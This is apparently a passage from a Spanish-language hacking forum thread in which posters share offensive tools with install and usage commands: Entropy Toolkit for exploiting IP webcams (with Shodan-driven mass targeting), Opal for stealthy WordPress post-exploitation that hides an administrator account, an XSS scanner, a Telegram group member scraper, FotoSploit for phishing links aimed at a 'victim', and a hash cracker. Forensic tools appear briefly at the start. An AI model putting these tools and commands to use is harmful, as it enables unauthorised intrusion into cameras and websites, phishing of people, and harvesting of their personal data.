esta herramienta nos ayuda a obtener metadatos de fotografias, por ejemplo informacion de la camara con que se todo la foto tambien nos puede mostrar infomacion de la ubicacion, tabien nos muestra hora dia, que tipo de camara o telefono la tomo entre otro tipo de informacion relevante..



Foremost, esta herramienta es de gran utilidad ya que hay aveces que nos pasa que sin querer borramos una fotografia o algun tipo de documento, e aqui donde entra foremost...

Foremost es un programa de consola para recuperar archivos basados ​​en sus encabezados, pies de página y estructuras de datos internas. Este proceso se conoce comúnmente como tallado de datos. Foremost puede trabajar en archivos de imagen, como los generados por dd, Safeback, Encase, etc., o directamente en una unidad. Los encabezados y pies de página pueden especificarse mediante un archivo de configuración o puede usar modificadores de línea de comandos para especificar los tipos de archivo integrados. Estos tipos integrados observan las estructuras de datos de un formato de archivo dado que permite una recuperación más confiable y más rápida



binwalk, esta herramienta para buscar en una imagen binaria determinada archivos incrustados y código ejecutable. Específicamente, está diseñado para identificar archivos y códigos incrustados dentro de imágenes de firmware. Binwalk utiliza la biblioteca libmagic, por lo que es compatible con las firmas mágicas creadas para la utilidad de archivo Unix. Binwalk también incluye un archivo de firma mágica personalizado que contiene firmas mejoradas para archivos que se encuentran comúnmente en imágenes de firmware como archivos comprimidos / archivados, encabezados de firmware, kernels de Linux, cargadores de arranque, sistemas de archivos, etc



Bueno mis amigos este post!! a llegado hasta este capitulo donde espero haya sido de tu agrado. en este recorrido espero dfruten de este breve analisis de estas exelentes herramientas, nos vemos en el proximo post...Gracias.

Por Ernesto Lopez
Alias: hack1kde 

Redactado CyberSec777

#11
Entropy Toolkit es un conjunto de herramientas para explotar
Cámaras web Netwave y GoAhead IP. La entropía es un
potente kit de herramientas para pruebas de penetración de cámaras web.



Comenzando la

instalación de Entropy
cd etropy
chmod + x No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
./install.sh

Desinstalación de entropía
entropía de cd
chmod + x No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
./uninstall.sh

Ejecución de Entropy Toolkit
entropía -h
usage: entropy [-h] [-b [1|2]] [-o <outputfile>] [--timeout <timeout>]
               [-t <tasks>] [-c <count>] [-q | -v]
               [-a <address> | -i <inputfile> | --shodan <API> | --zoomeye <API>]
               [-u]

optional arguments:
  -h, --help            show this help message and exit
  -b [1|2], --brand [1|2]
                        Choose the brand of IP Webcam. (1)Netwave, (2)GoAhead.
  -o <outputfile>, --output <outputfile>
                        Output into path you input.
  --timeout <timeout>   Timeout in seconds.
  -t <tasks>, --task <tasks>
                        Run tasks number of connects in parallel.
  -c <count>, --count <count>
                        The number of IP you want to get from ZoomEye.
  -q, --quiet           Quiet mode.
  -v, --verbose         Verbose mode.
  -a <add   ress>, --address <address>
                        IP:port address of the webcam.
  -i <inputfile>, --input <inputfile>
                        List of IP:port addresses of webcams.
  --shodan <API>        Your Shodan API key.
  --zoomeye <API>       Your ZoomEye API key.
  -u, --update          Update Entropy Toolkit.

Entropy Toolkit ejemplos
Ejemplo de explotación de una sola cámara web
entropy -b 1 -i 192.168.1.100:80 -v 
Ejemplo de explotación de cámaras web desde un archivo
entropy -b 2 -l iplist.txt -v
Ejemplo de cámaras web explotadoras que usan shodan
entropy -b 2 -v --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

Descargo de responsabilidad de Entropy Toolkit
Usage of the Entropy Toolkit for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state, federal, and international laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Link No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#12
Opal (Python2) [¿Por qué python2? bueno, me gusta y era un proyecto antiguo]
Marco de pos explotación de Stealth para Wordpress CMS



Repositorio oficial de ProjectOpal.

¿Qué es y por qué se hizo?
Lo hicimos intencionalmente para nuestros trabajos de pruebas de penetración, sin embargo, ahora está teniendo canas, así que pensamos que nos gustaría transmitirlo al público. ProjectOpal u Opal.

¡Es un marco sigiloso de exploits para sitios de wordpress que puede ocultar su rastro de los registros y ofuscarlo a través del sistema! :)

¡Funciones divertidas y divertidas, crea un usuario administrador que está oculto para todos los usuarios, incluidos los administradores! solo tenga en cuenta que está almacenado en la base de datos, así que no olvide eliminar sus rastros.

Descargar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#13
Esta es la versión extendida basada en la idea inicial ya publicada como "xssfinder". Esta versión privada permite a un atacante realizar no solo GET sino también solicitudes POST. Además, es posible proxy cada solicitud a través de Burp u otro túnel.




Primeros pasos
Cambie el nombre de example.app-settings.conf a app-settings.conf y ajuste la configuración. Debería funcionar fuera de la caja, pero dependiendo del objetivo, recomendaría cambiar el tamaño de los trozos.

Ejecución
Esta herramienta no espera ningún argumento a través de la CLI, así que simplemente escriba:
python3 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Configuración
Es posible establecer muchas opciones y configuraciones, así que aquí hay algunas explicaciones.

Archivos
El archivo de configuración principal es "app-settings.conf", ¡todo tiene que hacerse en ese archivo! Además de eso, hay algunos otros archivos que permiten configurar datos más complejos como encabezados, URL y cookies.
config / cookie-jar.txt
Use este archivo para agregar una cadena de cookies. Usualmente copio el que puedes ver en cada solicitud de eructos. Simplemente copie el valor del encabezado "Cookie:". Una entrada de muestra está en el archivo predeterminado.
config / http-headers.txt
Este archivo define los encabezados http que se agregan a la solicitud y se manipulan (la carga útil se agrega a cada uno). Los más importantes ya están en el archivo. Pero siéntase libre de agregar más.
config / parámetros.txt
La herramienta tiene la opción de obtener fuerza bruta para obtener y publicar parámetros. En ese caso, se utilizarán esos parámetros (+ los de la cadena de consulta). Cada parámetro obtiene la carga útil como valor. Lo más importante ya está en ese archivo.
config / urls-to-test.txt
¡Ese es el archivo que necesitas! Agregue aquí sus enlaces para escanear. Se permiten los siguientes formatos:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
dominio.com
Cuando se detecta el último caso, se antepone un "http: //". Esta herramienta está diseñada para funcionar con una buena lista de URL. Una buena manera de obtener uno es exportarlo usando eructar. Entonces tienes una lista válida de URL. Todo lo que necesita hacer es agregar sus cookies.
registros /
Esta es la carpeta de registro donde todo se registra.

Configuraciones
app-settings.conf definió el flujo de trabajo del programa. Es el archivo más importante, puede activar / desactivar diferentes módulos allí.
Configuración básica
HTTPTimeout
Algunas solicitudes pueden tardar mucho. Aquí puede definir el máximo. tiempo de ejecución de una solicitud. Recomiendo valores entre 2 y 6 segundos.
MaxThreads
Cuantos más subprocesos, más rápido es el script, pero como estamos lidiando con muchas conexiones, generalmente mantengo esto por debajo de 10 en mi computadora personal y alrededor de 30 en mi VPS.
Tipos de ataque
OnlyBaseRequest
Establecer esto en verdadero dará como resultado solo "solicitudes de base", esto significa que las listas de url solo se analizan y se extraen parámetros interesantes. Podrías usar eso para llenar tu mapa del sitio de eructos rápidamente.
UsePost
Use puede omitir las solicitudes POST configurando esto como "falso"
UseGet
Esto es similar: omita las solicitudes GET si está configurado como "falso"
Configuración de tipo de ataque
GetChunkSize
¿Cuántos parámetros GET para probar con una solicitud?
PostChunkSize
Cuántos parámetros POSTprobar con una solicitud?
Túnel
También es posible usar un túnel, por ejemplo "127.0.0.1:8080" (Burp Proxy), para monitorear todo el tráfico dentro de Burp.
Activo
Establecer esto en "verdadero" obligará al script a usar una conexión tunelizada.
Túnel
Configure aquí su servidor proxy "ip: puerto".
El resultado es el siguiente, cuando abres Burp puedes ver tu historial http:



Captura de pantalla






Descargar Extended-Xss-Search No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#14
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Excelente. Y mucho más para dedicarle un domingo  ;)

~ DtxdF

DtxdF dale bro duro vengo con mas
#15
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Geniall !!
Justo me estoy interesando con todo lo que es scraping asique me viene genial para practicar algo nuevo y revisar el codigo del script

Saludoss

espero que sea de tu agrado bro y funciona de maravilla
#16


En el artículo de hoy os traemos un scraper para obtener información de usuarios en grupos de Telegram, vamos a ver como aprovechar el domingo de cacharreo!!

Aparentemente puede parecer poca cosa, pero, gracias a los datos que nos da, no solo podremos crear nuestros scripts automáticos, si no que además podremos por ejemplo, obtener información adicional de usuarios. Con esto podemos descubrir el ID original de un usuario para reportarlo o para ver si es un usuario que ha cambiado de nombre.
Enlace del proyecto: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Para instalarlo, en nuestra máquina Linux abrimos la consola y ponemos:
git clone No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Una vez tenemos el proyecto debemos ir siguiendo los siguientes pasos.
Primero vamos a la API de Telegram a conseguir nuestras credenciales: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Una vez aquí, debemos ir completando los registros para obtener las claves.



Después pulsamos sobre la primera opción:



Y seguimos completando los campos necesarios:



Pulsamos en crear aplicación y nos saldrán nuestras claves. Es muy importante que no se compartan, esto daría acceso total a nuestro Telegram.
Nota: para el uso de esta aplicación deberemos quitar la verificación en dos pasos. Que no tiene nada que ver con el mensaje que ya llega a Telegram por defecto al entrar desde otros equipos.



Vamos ahora siguiendo los siguientes pasos. Accedemos a la carpeta desde la consola. Dentro de el directorio ponemos los siguientes comandos:

python3 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -i instalara requisitos



Tras esto, para el archivo de configuración:

python3 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -c  Creara un archivo de configuracion



Aquí meteremos las claves obtenidas en la API. El teléfono debemos ponerlo con la extensión incluida, es decir justo así «+34999999999«.
Una vez esté esto completado nos pedirá el código que nos llega al Telegram.



Una vez esté eso completado podremos ejecutar el programa.

python3 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Esto nos sacará toda la información sobre los usuarios del grupo que nos saldrá de la siguiente manera:



Si queremos ver la información recolectada bastará con acceder al archivo «members.csv«. y comando

cat members.csv



No vamos a explicar más, pero, si que nos vamos a quedar sacando ideas nuevas de uso para esta herramienta... podremos por ejemplo, con esta información y haciendo uso de la API, monitorizar usuarios, crear alertas sobre los mismos, crear o borrar mensajes...

VIDEO E INSTALACION

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#17
Hola amigos hoy les traigo una Herramienta lo cual sirve para hackear whatssap y telegram en sistemas android bien ablare un poco de su Instalacion

FotoSploit es un exploit que ensambla la foto
de nuestra víctima en un enlace falso {phishing}

FotoSploit in
Kali linux [nethunter]
UserLand
ubuntu
parrot
etc..



Instalación
pkg update && pkg upgrade -y
pkg install -y php
pkg install -y python2
pkg install -y git
cd $HOME
git clone No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
cd FotoSploit
ls
bash No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
./FotoSploit

Screenhost



¡¡¡Ojo!!!
El link portador por serveo o ngrok les informo que
en messenger [facebook] no saca la foto de la víctima:(
el link solo saca la foto en Whatzapp o en telegram u otro chat
ok!
.

Uso
  _____________________________________________________________________
             ___             _,.---,---.,_
             |           ,;~'             '~;,
             |         ,;                     ;,
    Frontal  |        ;                        ; ,--- Supraorbital Foramen
     Bone    |       ,'                        /'
             |      ,;                       /' ;,
             |      ; ;      .          . <-'  ; |
             |__   | ;   ______       ______   ;<----- Coronal Suture
             ___   |  '/~ ~ . ~ ~\'  |
            |      |  ~  ,-~~~^~, | ,~^~~~-,  ~  |
  Maxilla,  |       |   |        }:{        | <------ Orbit
Nasal and  |       |   l       / | \       !   |
Zygomatic  |      .~  (__,.-- .^. --.,__)  ~.
   Bones    |      |    ----;' / | \  ;-<--------- Infraorbital Foramen
         |__       \__.       \/^\/       .__
              ___    V| \                 / |V <--- Mastoid Process
              |       | |T~\___!___!___/~T| |
              |       | | IIII_I_I_I_IIII | |
     Mandible |       |  \ III I I I III,/  |
              |        \    ~~~~~~~~~~
             |          \   .       . <-x---- Mental Foramen
              |__          \.    ^    .
                             ^~~~^~~~^
_________________________________________________________________           
                Created by @CesarHackGray
                  Usage: show options

FotoSploit> show options
===============
Cesar Hack Gray
===============

Comandos          descripsion

show options      opciones
set foto          [option]
set title url     [Titulo]
set view          [FACEBOOK][YOUTUBE]
GO                Comenzar
run               Comenzar
exit              Salir


set title url Cesar-Hack-Gray (example)
set foto [youtube] [FreeFire] [PUBG]
[Anime] [pornografia] [Bokep] [facebook]
[/sdcard/example.jpg]


SET FOTO :
SET VIEW :
SET TITLE URL :


FotoSploit> set foto /sdcard/foto.jpg
  • FOTO => /sdcard/foto.jpg
    FotoSploit> set title url Name-Victim
  • Name => Name-Victim
    FotoSploit> set view YOUTUBE
  • VISTA => No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    FotoSploit> GO
  • Uploading -> /sdcard/foto.jpg...
  • Abriendo servidores...
  • Abriendo servidor php...
  • Abriendo servidor ssh...
  • Abriendo servidor ngrok..
  • Descargando ngrok full....
  • Obteniendo URLs..
  • Servicio de ayuda = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
  • Envia ala victima = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
  • Envia ala victima = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
  • Interactuando ala victima...

    Recuerde que el enlace solo toma la imagen en whatzapp o en telegrama



    Link

    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#18
gran proyecto pero sobre todo grandes mentes
#19
Hacking / HashCobra - Herramienta para descifrar hash
Diciembre 13, 2019, 10:25:48 AM
herramienta de hashcobra Hash Cracking

Uso
$ ./hashcobra -H
--==[ hashcobra by sepehrdad ]==--

usage:

  hashcobra -o <opr> [options] | [misc]

options:

  -a <alg>     - hashing algorithm [default: md5]
               - ? to list available algorithms
  -c <alg>     - compression algorithm [default: zstd]
               - ? to list available algorithms
  -h <hash>    - hash to crack
  -r <path>    - rainbow table path [default: hashcobra.db]
  -d <path>    - dictionary file path
  -o <opr>     - operation to do
               - ? to list available operations
misc:

  -V           - show version
  -H           - show help

example:

  # Create md5 rainbow table with zstd compression from rockyou.txt
  $ hashcobra -o create -d rockyou.txt

  # Create sha512 rainbow table wit   h no compression from darkc0de.lst
  $ hashcobra -o create -a sha512 -c none -r rt.db -d darkc0de.lst

  # Crack 1a1dc91c907325c69271ddf0c944bc72 using rt.db
  $ hashcobra -h 1a1dc91c907325c69271ddf0c944bc72 -r rt.db

Descripción
Esta herramienta utiliza tablas Rainbow para descifrar hash,
lo que hace que sea realmente rápido y mucho más rápido que el
cracker hashtradicional. Requisitos previos de construcción




Maquillaje se requiere.
Se requiere GCC 8.0 o superior.
Se requiere la versión más reciente de Rocksdb .
Se requiere la versión más reciente de Openssl .

edificio
$ make

AVISO LEGAL ¡
ESTE SOFTWARE SE PROPORCIONA SOLO PARA USO EDUCATIVO! SI PARTICIPA EN CUALQUIER ACTIVIDAD ILEGAL, EL AUTOR NO ASUME NINGUNA RESPONSABILIDAD POR ELLO. AL UTILIZAR ESTE SOFTWARE, ESTÁ DE ACUERDO CON ESTOS TÉRMINOS.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Les desea Felices Fiestas
#20
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola bro gracias por el aporte tengo una duda soy nuevo en esto del mundo de kali linux, copie todos los codigos al parecer todo salio bien pero me sale este error: python3: can't open file 'bin/karma.py': [Errno 2] No such file or directory

Gracias por tu ayuda.
si te dio el error es porque no instalastes las dependencias o requisitos ya que me dices que mandastes bien los comandos y te da error prueba con instalar lo explicado y me dices que tal va ya que esta probado en kali linux,parrot os,kodachi,ubuntu etc etc y sin problema